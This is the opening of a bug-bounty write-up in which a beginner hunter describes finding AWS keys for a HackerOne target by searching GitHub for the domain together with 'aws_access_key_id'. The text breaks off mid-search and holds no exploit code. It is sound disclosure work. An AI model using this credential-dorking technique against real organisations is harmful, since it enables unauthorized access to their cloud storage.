RCE VIA S3-BUCKET

الْحَمْدُ لِلَّهِ الَّذِي عَلِمَ بِالْقَلَمِ، عَلَّمَ الإِنْسَانَ مَا لَمْ يَعْلَمْ، وَالصَّلَاةُ وَالسَّلَامُ عَلَى خَيْرٍ مُعَلِّمِ النَّاسِ الْخَيْرَ، مُحَمَّدٍ أَمَّا بَعْدُ،

“Oh God bless and bless our master Mohammed, peace be upon him”

Hello, Hackers!
I hope you’re all doing well. This is my first write-up , and I wanted to share it with you. If there are any mistakes, please let me know in the comments.

Whoami?
My name is Ahmed Moez, or you can call me “2BM03z”. I’m 21 years old, and I started bug hunting before 3 months ago.

Summary
The vulnerability I’m sharing with you is in a BBP program in hackerone. , let’s call it target.com. It’s an Rce via s3-Bucket vulnerability caused by a Github dorking . This flaw allowed me to access the bucket and upload or delete any file There , which could give me full access to the entire Bucket.

Let’s start the story in detail.

The first thing I always do when testing a website is doing recon and dorking , so i started with Github dorking This usually takes me around 1–2 hours to look at all the repos and github .

so i did that in the search at github target.com “aws_access_key_id”and i surprissed from that i have so many repos to lookwhile i looking at the repos and filter every repo i see something interesting